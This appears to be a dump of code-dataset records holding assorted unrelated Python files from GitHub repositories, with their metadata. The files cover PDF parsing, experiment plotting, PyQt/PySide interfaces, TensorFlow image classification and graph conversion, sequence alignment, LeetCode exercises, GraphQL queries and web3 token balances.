lines['text'].lower()\n last_header = last_header.replace('.', '').strip()\n headers[-1] = last_header\n\n elif RegularFont.match(lines['font']):\n if last_header not in list(current_result.keys()):\n current_result[last_header] = []\n if not connected or len(current_result[last_header]) == 0 or indent:\n self.header2page[last_header] = page_n\n current_result[last_header].append(lines['text'])\n elif connected:\n if len(current_result[last_header][-1]) < 1 or current_result[last_header][-1][-1] != '-':\n current_result[last_header][-1] += ' '\n else:\n current_result[last_header][-1] = current_result[last_header][-1][:-1]\n current_result[last_header][-1] += lines['text']\n\n last_font = lines['font']\n last_bbox = lines['bbox']\n page_n += 1\n pdf.close()\n\nclass PDFFont:\n FONTS = []\n @classmethod\n def match(cls, font):\n return font in cls.FONTS\n @classmethod\n def get_cls(cls, text):\n for font in cls.__subclasses__():\n if text in font.FONTS:\n return font\n return PDFFont\n \nclass HeaderFont(PDFFont): FONTS = [\"Minion-SwashDisplayItalic\", \"AGaramond-SemiboldItalic\", \"AGaramond-Bold\", \"AGaramond-BoldItalic\"]\nclass RegularFont(PDFFont): FONTS = [\"AGaramond-Regular\", \"AGaramond-Italic\"]\nclass GraphicFont(PDFFont): FONTS = [\"Futura-CondensedBold\"]\n\n\n","repo_name":"MannanB/MedGPT","sub_path":"src/data_processing/handbook.py","file_name":"handbook.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"21291717567","text":"import collections\nimport slurmqueen\nimport util\n\n\"\"\"\"\nDefinition and analysis of experiments computing graph decomposition quality.\n\"\"\"\n\nTIMEOUT = 1000\n\n\nclass DecompositionData:\n def __init__(self, data_dir):\n self.__instance = slurmqueen.Experiment(\"\", []).instance(data_dir)\n\n def extract_best_decompositions_vertex_cover(self):\n data = self.__instance.query(\n \"SELECT [Carving], [Tree], [|num_vars], [|i] FROM data\"\n )\n\n # Take the best decomposition found across all solvers on each benchmark\n data = data.groupby([\"|num_vars\", \"|i\"], as_index=False).min()\n\n # Take the median runtime for each number of variables, across all 100 benchmarks\n data = data.groupby([\"|num_vars\"], as_index=False).median()\n\n if len(data) != 21:\n print(\n \"Only {0}/21 options for the numbers of variables observed for {1}\".format(\n len(data), self.__instance\n )\n )\n\n return data.sort_values(\"|num_vars\")\n\n def extract_best_decompositions_wmc(self):\n data = self.__instance.query(\n \"SELECT [Carving], [Tree], [|benchmark], [output] FROM data\"\n )\n\n # Take the best decomposition found across all solvers on each benchmark\n data = data.groupby([\"|benchmark\"], as_index=False).min()\n\n if len(data) != 1091:\n print(\n \"Only {0}/1091 options for the numbers of variables observed for {1}\".format(\n len(data), self.__instance\n )\n )\n return data.sort_values(\"|benchmark\")\n\n def threshold_times(self, method, width, default_val=None):\n \"\"\"\n For each log, find the time at which the solver first found a contraction tree of max-rank at or below [width].\n\n :param width: The bound on max-rank to check.\n :param default_val: The time to use if the solver never finds a good enough contraction tree\n :return: A list of times\n \"\"\"\n data = self.__instance.query(\n 'SELECT [Log] FROM data WHERE [method] =\"'\n + method\n + '\" ORDER BY [|benchmark] DESC'\n )\n result = []\n for log in data[\"Log\"]:\n best_width = None\n found = False\n if log is not None:\n for time, widths in eval(log):\n if best_width is None or widths[\"Carving\"] < best_width:\n if widths[\"Carving\"] <= width and (\n best_width is None or best_width > width\n ):\n result.append(time)\n found = True\n break\n if not found:\n result.append(default_val)\n return result\n\n\nga_vertex_cover_line = DecompositionData(\n util.data_dir(\"3/appendix_graph_analysis/cubic_vertex_cover/line\")\n)\nga_vertex_cover_factor = DecompositionData(\n util.data_dir(\"3/appendix_graph_analysis/cubic_vertex_cover/factor\")\n)\n\n\ndef plot_graph_analysis_vertex_cover(ax):\n line = ga_vertex_cover_line.extract_best_decompositions_vertex_cover()\n factor = ga_vertex_cover_factor.extract_best_decompositions_vertex_cover()\n\n DisplayInfo = collections.namedtuple(\n \"DisplayInfo\", [\"name\", \"data\", \"color\", \"marker\"]\n )\n lines_to_display = [\n DisplayInfo(\"Treewidth of $Line(G)$\", line[\"Tree\"], \"#c11e96\", \"o\"),\n DisplayInfo(\"Treewidth of $G$\", factor[\"Tree\"], \"#023880\", \"v\"),\n DisplayInfo(\n \"Carving width of $G$ using \\\\textbf{FT}\", factor[\"Carving\"], \"#a7e831\", \"s\"\n ),\n DisplayInfo(\n \"Carving width of $G$ using \\\\textbf{LG}\", line[\"Carving\"], \"#86d7a9\", \"*\"\n ),\n ]\n for exp_info in lines_to_display:\n ax.plot(\n line[\"|num_vars\"],\n exp_info.data,\n color=exp_info.color,\n linewidth=1,\n markersize=5,\n markerfacecolor=exp_info.color,\n markeredgewidth=0.5,\n markeredgecolor=\"black\",\n marker=exp_info.marker,\n label=exp_info.name,\n )\n\n util.set_legend(ax, loc=\"upper left\")\n ax.set_xticks([50, 100, 150, 200, 250])\n ax.set_xlabel(\"$n$: Number of vertices\")\n ax.set_ylabel(\"Width of decomposition\")\n\n\nga_wmc_line = DecompositionData(util.data_dir(\"3/appendix_graph_analysis/wmc/line\"))\nga_wmc_factor = DecompositionData(util.data_dir(\"3/appendix_graph_analysis/wmc/factor\"))\n\n\ndef plot_graph_analysis_lg_wmc(ax):\n line = ga_wmc_line.extract_best_decompositions_wmc()\n\n def cap_data(data, column):\n data = data.copy()\n data.loc[data[column] > 200, column] = 200\n return data[column]\n\n DisplayInfo = collections.namedtuple(\"DisplayInfo\", [\"name\", \"data\", \"color\"])\n bars_to_display = [\n DisplayInfo(\"Treewidth of $Line(G)$\", cap_data(line, \"Tree\"), \"#c11e96\"),\n DisplayInfo(\n \"Carving width of $G$ using \\\\textbf{LG}\",\n cap_data(line, \"Carving\"),\n \"#86d7a9\",\n ),\n ]\n\n ax.hist(\n [d.data for d in bars_to_display],\n bins=range(0, 210, 10),\n histtype=\"bar\",\n color=[d.color for d in bars_to_display],\n label=[d.name for d in bars_to_display],\n )\n\n util.set_legend(ax, loc=\"upper right\")\n ax.set_xticks([0, 50, 100, 150, 200])\n ax.set_xticklabels([\"0\", \"50\", \"100\", \"150\", \"$200+$\"])\n\n ax.set_xlabel(\"Width of decomposition\")\n ax.set_ylabel(\"Number of benchmarks\")\n\n\ndef plot_graph_analysis_ft_wmc(ax):\n factor = ga_wmc_factor.extract_best_decompositions_wmc()\n\n def cap_data(data, column):\n data = data.copy()\n data.loc[data[column] > 50, column] = 50\n return data[column]\n\n DisplayInfo = collections.namedtuple(\"DisplayInfo\", [\"name\", \"data\", \"color\"])\n bars_to_display = [\n DisplayInfo(\"Treewidth of $G$\", cap_data(factor, \"Tree\"), \"#023880\"),\n DisplayInfo(\n \"Carving width after \\\\textbf{FT}\", cap_data(factor, \"Carving\"), \"#a7e831\"\n ),\n ]\n\n ax.hist(\n [d.data for d in bars_to_display],\n bins=range(0, 54, 2),\n histtype=\"bar\",\n align=\"mid\",\n color=[d.color for d in bars_to_display],\n label=[d.name for d in bars_to_display],\n )\n\n util.set_legend(ax, loc=\"upper right\")\n ax.set_xticks([0, 10, 20, 30, 40, 50])\n ax.set_xticklabels([\"0\", \"10\", \"20\", \"30\", \"40\", \"$50+$\"])\n\n ax.set_xlabel(\"Width of decomposition\")\n ax.set_ylabel(\"Number of benchmarks\")\n\n\ndef plot_planning_fig(axs):\n for ax, width in zip(axs, [30, 25, 20]):\n ax.plot(\n *util.cactus(\n ga_wmc_factor.threshold_times(\"factor-htd\", width, default_val=TIMEOUT)\n ),\n label=\"FT+htd\",\n color=\"#ffd700\",\n linestyle=\"--\",\n linewidth=2,\n )\n\n ax.plot(\n *util.cactus(\n ga_wmc_factor.threshold_times(\"factor-Flow\", width, default_val=TIMEOUT)\n ),\n label=\"FT+Flow\",\n color=\"#ffb14e\",\n linestyle=\":\",\n linewidth=2,\n )\n ax.plot(\n *util.cactus(\n ga_wmc_factor.threshold_times(\n \"factor-Tamaki\", width, default_val=TIMEOUT\n )\n ),\n label=\"FT+Tamaki\",\n color=\"#fa8775\",\n linestyle=\"-\",\n linewidth=2,\n )\n util.set_cactus_axes(\n ax, 1091, TIMEOUT, legend_args={\"loc\": \"lower right\"}, bottom=0.1\n )\n\n\ndef gen(output):\n f, ax = output.figure(0.6, ncols=1)\n plot_graph_analysis_vertex_cover(ax)\n f.save(\"3/appendix_vertex_cover_width\")\n\n f, ax = output.figure(0.6, ncols=1)\n plot_graph_analysis_lg_wmc(ax)\n f.save(\"3/appendix_wmc_lg_width\")\n\n f, ax = output.figure(0.6, ncols=1)\n plot_graph_analysis_ft_wmc(ax)\n f.save(\"3/appendix_wmc_ft_width\")\n\n f, axs = output.figure(1, nrows=3)\n plot_planning_fig(axs)\n f.save(\"3/tree_solver_analysis\")\n\n\nif __name__ == \"__main__\":\n gen(util.output_pdf())\n","repo_name":"Kasekopf/PhD-Thesis","sub_path":"experiments/src/3/gen_decomposition.py","file_name":"gen_decomposition.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"38784507653","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtCore, QtGui\nfrom UI_CLASSES.ingresar_integrante import Ui_ingresar_integrante\nfrom CLASSES.usuario import Usuario\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\nclass IngresarIntegrante(QtGui.QDialog):\n\n def __init__(self,grupo_actual,conexionDB):\n super(IngresarIntegrante, self).__init__()\n self.ingreso = Ui_ingresar_integrante()\n self.ingreso.setupUi(self)\n self.grupo_actual=grupo_actual\n self.conexionDB=conexionDB\n self.ing_integrante=None\n QtCore.QObject.connect(self.ingreso.btIntegrante, QtCore.SIGNAL('clicked()'),\n self.Ingresar)\n self.exec_()\n\n\n def Ingresar(self):\n integrant=self.ingreso.txtintegrante.text()\n ing_integrante=Usuario(email=integrant,ultimo_acceso=\"\", total_emails=0)\n ok = self.conexionDB.agregar_usuario_grupo(ing_integrante, self.grupo_actual)\n print(ok)\n if ok is None:\n QtGui.QMessageBox.warning(self, 'informacion', 'El Integrante se ha'\n ' ingresado exitosamente.')\n self.ingreso.hide()\n else:\n QtGui.QMessageBox.warning(self, 'Error', ' El correo ya existe, intentelo'\n ' de nuevo.')\n\n","repo_name":"Daniers/Superior-Core","sub_path":"App Superior Core/CLASSES/ingresar_integrante.py","file_name":"ingresar_integrante.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"37248993783","text":"import codecs\n\nw = codecs.open('matching_result.txt','w','utf-8')\nwith codecs.open('search_result.txt','r','utf-8') as file:\n while True:\n line = file.readline()\n if line == \"end\":\n break\n\n if 'matching' in line:\n if '.0' in line:\n w.write(line)\n\n else:\n continue\n","repo_name":"skku-swpc/yonsei_dilab_sentiment","sub_path":"sentiment/matching_result.py","file_name":"matching_result.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"32664771173","text":"import tensorflow as tf\n\n# Load the already trained model\nmodelo = tf.keras.models.load_model('model')\n# Show the info about the model\nmodelo.summary()\n\n\n\n# import the opencv library\nimport numpy as np\n\ndef predecir(input):\n #Normalize the image\n img = np.array(input).astype(float)/255\n img = cv2.resize(img, (224,224))\n\n output = modelo.predict(img.reshape(-1, 224, 224, 3))\n return np.argmax(output[0])\n\n\n\nimport cv2\n# define a video capture object\nvid = cv2.VideoCapture(0)\n\nwhile(True):\n # Capture the video frame\n # by frame\n ret, frame = vid.read()\n \n # Execute analisis and print the \n analisis = predecir(frame)\n texto = 'esperando'\n if(analisis == 1):\n texto = 'Exportacion'\n elif(analisis == 2):\n texto = 'Rechazar'\n else:\n texto = 'Aceptable'\n \n # Text configuration, font, size, position\n font = cv2.FONT_HERSHEY_SIMPLEX \n cv2.putText(frame, texto, (7,70), font, 3, (100, 255, 0), 3, cv2.LINE_AA)\n \n \n # Display the resulting frame\n cv2.imshow('frame', frame)\n \n # the 'q' button is set as the\n # quitting button\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n# After the loop release the cap object\nvid.release()\n# Destroy all the windows\ncv2.destroyAllWindows()\n\n\n\n","repo_name":"CinnamonTheGreat/clasificador-mango","sub_path":"src/clasificador.py","file_name":"clasificador.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18801805146","text":"from typing import Generator, List, Optional\nfrom kd_common import logutil\nimport subprocess\nimport contextlib\nimport re\n\nfrom kd_splicing.models import AlignStatus\nfrom kd_splicing.exception import CustomException\n\n_logger = logutil.get_logger(__name__)\n\ndef run_multiple(input_files: List[str]) -> List[str]:\n return [run_single(f) for f in input_files]\n\ndef run_single(input_file: str, output_file: Optional[str] = None) -> str:\n if not output_file:\n output_file = input_file + \".aligned\"\n\n blast_args = [\n \"kalign\", \"-i\", input_file, \"-o\", output_file,\n ]\n _logger.info(\"Start Kaline\")\n r = subprocess.call(blast_args)\n try: \n r = subprocess.check_output(blast_args, stderr=subprocess.STDOUT, timeout=10)\n except subprocess.CalledProcessError as e:\n raise CustomException(\"Muscle alignment error\")\n except subprocess.TimeoutExpired as e:\n raise CustomException('One of the entered sequences is too long, check out troubleshooting')\n _logger.info(r)\n _logger.info(\"Finish Muscle\")\n return output_file\n","repo_name":"kdcd/catsnap","sub_path":"kd_splicing/kd_splicing/kalign.py","file_name":"kalign.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24877570804","text":"from typing import List\nfrom collections import defaultdict\n\n\nclass Solution:\n def find_sub_arrays(self, nums: List[int]) -> bool:\n if len(nums) == 2:\n return False\n d = defaultdict(List[int])\n sum = 0\n for i in range(len(nums)):\n for j in range(i + 1, len(nums)):\n sum = nums[i] + nums[j]\n if sum not in d:\n d[sum] = [nums[i], nums[j]]\n else:\n d[sum] = d[sum] + [nums[i], nums[j]]\n for key, values in d.items():\n if d[key] == 2:\n return True\n else:\n return False\n\ns = Solution()\nprint(s.find_sub_arrays(nums = [4,2,4]))","repo_name":"AliAnsariArshad/LeetCode","sub_path":"Problems/Easy/Array[list]/FindSubArrays.py","file_name":"FindSubArrays.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5968767408","text":"'''\nDICIONÁRIO E LOOPE FOR\n'''\nclientes = {\n 'cliente1':\n {\n 'blusa': 'cavalera',\n 'calça': 'hering'\n},\n'cliente2':\n {\n 'blusa':'tommy',\n 'calça':'tommy'\n},\n 'cliente3':\n {'blusa':'dc',\n 'calça':'tommy'}\n}\n# LOOPE FOR\nfor clientes_k, clientes_v in clientes.items():\n print(f'Exibindo{clientes_k}')\n for dados_k, dados_v in clientes.items():\n print(f'\\t{dados_k}={dados_v}')\n\n\n## TRANSFORMAR LISTA EM DICIONÁRIO\ndicionario = [\n [1,'Paulo'],\n [2,'Carlos'],\n [3,'Eduardo'],\n [5, 'Barbara'],\n [6, 'Felipe'],\n [7, 'Pedro']\n]\nd5 = {2:'Novo', 3: 'mdb'}\nprint(dicionario)\n## Casting\ndicio = dict(dicionario)\nprint(dicio)\ndicio.pop(1) # Eliminar uma chave, preciso dizer qual chave\nprint(dicio)\ndicio.popitem() ## Eliminar o último item, idependente de qual seja esse item\nprint(dicio)\ndicio.update(d5) ## Concatenar os dois dicionários\nprint(dicio)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"phmartinsconsult/curso_python_3_luis_otavio","sub_path":"Aula_33_Dicionário_B.py","file_name":"Aula_33_Dicionário_B.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"20001311034","text":"\"\"\"51. N-Queens\"\"\"\n\nclass Solution(object):\n def solveNQueens(self, n):\n \"\"\"\n :type n: int\n :rtype: List[List[str]]\n \"\"\"\n ## Practice:\n res = []\n nums = [-1]*n\n self.dfs(nums, 0, [], res)\n return res\n\n def dfs(self, nums, index, path, res):\n if index == len(nums): #触发结束条件:index(row) 超过 path(4) 的最后一行\n res.append(path)\n return\n for i in range(len(nums)):\n nums[index] = i\n if self.valid(nums, index): #排除不合法选择\n tmp = \".\"*len(nums)\n self.dfs(nums, index+1, path + [str(tmp[:i]+'Q'+tmp[i+1:])], res)\n\n def valid(self, nums, index):\n for i in range(index):\n #检查左上方是否有皇后互相冲突 or 检查列是否有皇后互相冲突\n if abs(nums[index]-nums[i])==index-i or nums[index]==nums[i]:\n return False\n return True\n\n ##\n\n res = []\n self.dfs([-1]*n, 0, [], res)\n return res\n\n def dfs(self, nums, index, path, res):\n if index == len(nums):\n res.append(path)\n return\n\n for i in range(len(nums)):\n nums[index] = i\n if self.valid(nums, index):\n tmp = \".\"*len(nums)\n self.dfs(nums, index+1, path + [str(tmp[:i]+\"Q\"+tmp[i+1:])], res)\n\n def valid(self, nums, n):\n for i in range(n):\n if abs(nums[i]-nums[n]) == n - i or nums[i] == nums[n]:\n return False\n\n return True\n","repo_name":"wilbertgeng/LeetCode_exercise","sub_path":"51.py","file_name":"51.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11265764688","text":"from gql import gql\nfrom typing import Sequence\n\nclass getMethods:\n\n _GetGlobalPolicyFunctionQuery = \"\"\"\n query GetGlobalPolicyFunction($gpfn: String!) {\n GlobalPolicyFunctions(where: {name: {_eq: $gpfn}}) {\n name\n function\n id\n }\n}\n \"\"\"\n\n def GetGlobalPolicyFunction(self, gpfn: str):\n query = gql(self._GetGlobalPolicyFunctionQuery)\n variables = {\n \"gpfn\": gpfn,\n }\n operation_name = \"GetGlobalPolicyFunction\"\n return self.execute(query, variable_values=variables, operation_name=operation_name)\n","repo_name":"kivera-io/python-client","sub_path":"kivera/globalpolicyfunctions/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"32915395788","text":"from web3 import Web3\nimport contracts.doe_token_abi as doe_token_abi\n\n\ndef get_main_balance(w3, wallet):\n contract_address = \"0xf8E9F10c22840b613cdA05A0c5Fdb59A4d6cd7eF\"\n contract = w3.eth.contract(address=contract_address, abi=doe_token_abi.get_abi())\n balanceOf = contract.functions.balanceOf(wallet).call()\n return Web3.fromWei(balanceOf, 'ether')\n\ndef get_arb_balance(w3, wallet):\n contract_address = \"0xE71Db7a96daB25cDb9f4cbC7F686da02192B0E88\"\n contract = w3.eth.contract(address=contract_address, abi=doe_token_abi.get_abi())\n balanceOf = contract.functions.balanceOf(wallet).call()\n return Web3.fromWei(balanceOf, 'ether')\n","repo_name":"pettitpeon/doe-nft-contract","sub_path":"contracts/doe_token_contract.py","file_name":"doe_token_contract.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"70832622921","text":"#!/usr/bin/env python3\n\nimport sys\nfrom functools import reduce\nimport operator\nimport math\n\nfilename = sys.argv[1]\n\nimport tensorflow as tf\nfrom tensorflow.core.framework import graph_pb2\nimport numpy\n\ngraph_def = graph_pb2.GraphDef()\ngraph_def.ParseFromString(open(filename, mode='rb').read())\ntf.import_graph_def(graph_def)\ngraph = tf.compat.v1.get_default_graph()\n\nfirst = True\npaddings = {}\n\nprint('ml.Layer.input_bias = False')\n\ndef output(op, layer, prev_input=True):\n global first\n print('named[\"%s\"] = %s' % (op.name, layer))\n print('layers.append(named[\"%s\"])' % op.name)\n if prev_input and not first:\n print('named[\"%s\"].inputs = [named[\"%s\"]]' % (op.name,\n op.inputs[0].name[:-2]))\n first = False\n\ndef link(dest, source):\n print('named[\"%s\"] = named[\"%s\"]' % (dest.name, source.name))\n\ndef source(dest):\n print('named[\"%s\"] = None' % dest.name)\n\ndef activate_bias(op):\n print('named[\"%s\"].input_bias = True' % op.name)\n\ndef get_shape(shape):\n res = []\n for x in shape:\n try:\n res.append(int(x))\n except:\n res.append(1)\n return res\n\ndef get_valid_padding(input_shape, window, strides):\n return [int(math.ceil((x - y + 1) / z))\n for x, y, z in zip(input_shape, window, strides)]\n\nfor op in graph.get_operations():\n if op.inputs:\n shape = get_shape(op.inputs[0].shape)\n else:\n shape = None\n t = op.type\n if t in ('VariableV2', 'Const', 'Assign', 'NoOp', 'Fill', 'VarHandleOp'):\n source(op)\n elif t in ('Reshape', 'Squeeze', 'Identity', 'VarIsInitializedOp', 'ReadVariableOp',\n 'AssignVariableOp'):\n link(op, op.inputs[0].op)\n elif t == 'Placeholder':\n source(op)\n elif t == 'MatMul':\n #print (op.inputs[0].shape)\n assert reduce(operator.mul, shape) == op.inputs[1].shape[0]\n output(op, 'ml.Dense(1, %d, %d)' % (op.inputs[1].shape[0],\n op.inputs[1].shape[1]))\n shape = [1, int(op.inputs[1].shape[1])]\n elif t == 'Conv2D':\n strides = op.get_attr('strides')\n assert len(strides) == 4\n assert strides[0] == 1\n assert strides[3] == 1\n strides = tuple(strides[1:3])\n input_shape = get_shape(op.inputs[0].shape)\n assert len(input_shape) == 4\n window = [int(x) for x in op.inputs[1].shape]\n padding = op.get_attr('padding').decode('u8')\n if padding not in ('SAME', 'VALID'):\n padding = get_shape(padding)\n if op.inputs[0].op.name in paddings:\n assert padding == 'VALID'\n input_shape = get_shape(op.inputs[0].op.inputs[0].shape)\n p = paddings.pop(op.inputs[0].op.name)\n for i in 0, 6:\n assert p[i] == 0\n padding = [p[2], p[4]]\n output_shape = get_shape(op.outputs[0].shape)\n assert len(output_shape) == 4\n output(op, 'ml.FixConv2d(%s, %s, %s, %s, %s, %s, True, '\n 'inputs=[named[\"%s\"]])' % \\\n (input_shape, tuple(window), (window[3],), output_shape, strides,\n repr(padding), op.inputs[0].op.name))\n elif t in ('Add', 'AddV2') and op.inputs[1].op.type != 'VariableV2':\n output(op, 'ml.Add([%s])' % ','.join('named[\"%s\"]' % x.op.name\n for x in op.inputs), False)\n elif t in ('Add', 'BiasAdd'):\n assert op.inputs[0].op.type in ('MatMul', 'Conv2D')\n activate_bias(op.inputs[0].op)\n link(op, op.inputs[0].op)\n elif t == 'Relu':\n assert len(op.inputs) == 1\n output(op, 'ml.Relu(%s, inputs=[named[\"%s\"]])' % (shape,\n op.inputs[0].op.name))\n elif t == 'Square':\n output(op, 'ml.Square(%s)' % (shape,))\n elif t == 'MaxPool':\n strides = op.get_attr('strides')\n ksize = op.get_attr('ksize')\n padding = str(op.get_attr('padding').decode('u8'))\n output(op, 'ml.MaxPool(%s, %s, %s, \"%s\")' % (shape, strides, ksize,\n padding))\n elif t == 'AvgPool':\n filter_size = op.get_attr('ksize')\n assert len(filter_size) == 4\n assert filter_size[0] == 1\n assert filter_size[-1] == 1\n input_shape = get_shape(op.inputs[0].shape)\n strides = get_shape(op.get_attr('strides'))\n assert strides[0] == 1\n assert strides[3] == 1\n padding = op.get_attr('padding').decode('u8')\n if padding == 'VALID':\n output_shape = get_valid_padding(input_shape, filter_size, strides)\n elif padding == 'SAME':\n output_shape = [int(math.ceil(x / y))\n for x, y in zip(input_shape, filter_size)]\n else:\n raise Exception('unknown padding type: %s' % padding)\n output(op, 'ml.FixAveragePool2d(%s, %s, %s, %s)' %\n (input_shape, output_shape, filter_size[1:3], strides[1:3]))\n elif t == 'ArgMax':\n assert len(op.inputs) == 2\n shape = get_shape(op.inputs[0].shape)\n dim = int(op.inputs[1].op.get_attr('value').int_val[0])\n for i in range(1, len(shape)):\n if i != dim:\n assert shape[i] == 1\n output(op, 'ml.Argmax((1, %s))' % shape[dim])\n elif t == 'ConcatV2':\n assert len(op.inputs) == 3\n dim = int(op.inputs[2].op.get_attr('value').int_val[0])\n output(op, 'ml.Concat([%s], %s)' % (\n ','.join('named[\"%s\"]' % x.name[:-2] for x in op.inputs[:2]), dim),\n prev_input=False)\n elif t in ('FusedBatchNorm', 'FusedBatchNormV3'):\n output(op, 'ml.FusedBatchNorm(%s, inputs=[named[\"%s\"]])' %\n (get_shape(op.inputs[0].shape), op.inputs[0].op.name))\n elif t == 'Pad':\n paddings[op.name] = numpy.fromstring(op.inputs[1].op.get_attr('value').\n tensor_content, 'int32').tolist()\n link(op, op.inputs[0].op)\n else:\n raise Exception('unknown type: %s' % t)\n\nif paddings:\n raise Exception('padding layers only supported before valid convolution:',\n paddings)\n","repo_name":"PlatONnetwork/proof_of_custody","sub_path":"Scripts/process-tf.py","file_name":"process-tf.py","file_ext":"py","file_size_in_byte":6230,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"63"} +{"seq_id":"34471168130","text":"\nimport sys\nfrom PySide2 import QtWidgets\n\n# from other py files\nfrom csvviewui import TreeMain\nfrom treeanalysis import Classification\n\n\nclass DataVisualisationApp(QtWidgets.QWidget):\n def __init__(self, parent=None):\n super(DataVisualisationApp, self).__init__(parent)\n\n self.filepath = \\\n '/Users/johnwondoh/PycharmProjects/untitled1/pyside_project/graduate-admissions/Admission_Predict.csv'\n\n # Setting up visualisation\n self.plots = Classification(self.filepath)\n self.plots.decision_tree()\n self.plots.scatter_plots()\n\n self.grid = QtWidgets.QGridLayout()\n\n self.btn_QTreeWidget = QtWidgets.QPushButton('Use QTreeWidget')\n self.btn_QTreeView = QtWidgets.QPushButton('Use QTreeView')\n self.btn_decision_tree = QtWidgets.QPushButton('Decision Tree')\n self.btn_scatter_plot = QtWidgets.QPushButton('Scatter Plot')\n\n # set the style sheet for when the buttons are clicked\n self.set_clicked_style = 'QPushButton {' \\\n 'width: 100px;' \\\n 'background-color: #4286f4; ' \\\n 'border-radius: 2px;' \\\n '}'\n\n self.tree = TreeMain(self.filepath)\n\n # create placeholders to be added to the grid\n self.placeholder1 = QtWidgets.QLabel()\n self.placeholder1.setText('Select method to view the data')\n\n self.placeholder2 = QtWidgets.QLabel()\n self.placeholder2.setText('Select your preferred visualisation type')\n # self.img_tree = self.tree.view_img()\n\n self.grid_ui()\n\n # make connections to buttons\n self.btn_QTreeWidget.clicked.connect(self.on_click_QTreeWidget)\n self.btn_QTreeView.clicked.connect(self.on_click_QTreeView)\n self.btn_decision_tree.clicked.connect(self.on_click_decision_tree)\n self.btn_scatter_plot.clicked.connect(self.on_click_scatter_plot)\n\n def grid_ui(self):\n self.grid.setColumnStretch(0, 0)\n self.grid.setColumnStretch(1, 4)\n # grid.setRowStretch(, int stretch)\n\n self.grid.addWidget(self.buttons_for_trees(), 0, 0)\n self.grid.addWidget(self.buttons_for_visualisation(), 1, 0)\n self.grid.addWidget(self.placeholder1, 0, 1)\n self.grid.addWidget(self.placeholder2, 1, 1)\n self.setLayout(self.grid)\n\n self.setWindowTitle(\"PyQt5 Group Box\")\n self.resize(1000, 800)\n\n def buttons_for_trees(self):\n tree_button_layout = QtWidgets.QVBoxLayout()\n tree_button_layout.addWidget(self.btn_QTreeWidget)\n tree_button_layout.addWidget(self.btn_QTreeView)\n tree_button_layout.addStretch(1)\n\n tree_buttons = QtWidgets.QGroupBox('Select Tree View Type')\n tree_buttons.setLayout(tree_button_layout)\n return tree_buttons\n\n def buttons_for_visualisation(self):\n v_button_layout = QtWidgets.QVBoxLayout()\n v_button_layout.addWidget(self.btn_decision_tree)\n v_button_layout.addWidget(self.btn_scatter_plot)\n v_button_layout.addStretch(1)\n\n v_buttons = QtWidgets.QGroupBox('Select Visualisation type Type')\n v_buttons.setLayout(v_button_layout)\n return v_buttons\n\n def createExampleGroup(self):\n groupBox = QtWidgets.QGroupBox(\"Best Food\")\n\n radio1 = QtWidgets.QRadioButton(\"&Radio pizza\")\n radio2 = QtWidgets.QRadioButton(\"R&adio taco\")\n radio3 = QtWidgets.QRadioButton(\"Ra&dio burrito\")\n\n radio1.setChecked(True)\n\n vbox = QtWidgets.QVBoxLayout()\n vbox.addWidget(radio1)\n vbox.addWidget(radio2)\n vbox.addWidget(radio3)\n vbox.addStretch(1)\n groupBox.setLayout(vbox)\n\n return groupBox\n\n # actions\n # @pyqtSlot()\n def on_click_QTreeView(self):\n # toggling button clicked\n self.btn_QTreeView.setStyleSheet(self.set_clicked_style)\n self.btn_QTreeWidget.setStyleSheet('')\n\n # add widget\n view = self.grid.itemAtPosition(0, 1).widget()\n view.setParent(None)\n new_tree_view = self.tree.get_tree_view()\n self.grid.addWidget(new_tree_view, 0, 1)\n\n def on_click_QTreeWidget(self):\n self.btn_QTreeWidget.setStyleSheet(self.set_clicked_style)\n self.btn_QTreeView.setStyleSheet('')\n\n widget = self.grid.itemAtPosition(0, 1).widget()\n widget.setParent(None)\n new_tree_widget = self.tree.get_tree_widget()\n self.grid.addWidget(new_tree_widget, 0, 1)\n\n def on_click_decision_tree(self):\n self.btn_decision_tree.setStyleSheet(self.set_clicked_style)\n self.btn_scatter_plot.setStyleSheet('')\n\n img_widget = self.grid.itemAtPosition(1, 1).widget()\n img_widget.setParent(None)\n\n new_img_box = QtWidgets.QGroupBox(\"Visualise Decision Tree\")\n new_img = self.tree.view_tree_plot_img()\n new_img_box.setLayout(new_img)\n self.grid.addWidget(new_img_box, 1, 1)\n\n def on_click_scatter_plot(self):\n self.btn_scatter_plot.setStyleSheet(self.set_clicked_style)\n self.btn_decision_tree.setStyleSheet('')\n\n img_widget = self.grid.itemAtPosition(1, 1).widget()\n img_widget.setParent(None)\n\n new_img_box = QtWidgets.QGroupBox(\"Visualise Scatter Plot\")\n new_img = self.tree.view_scatter_plot_img()\n 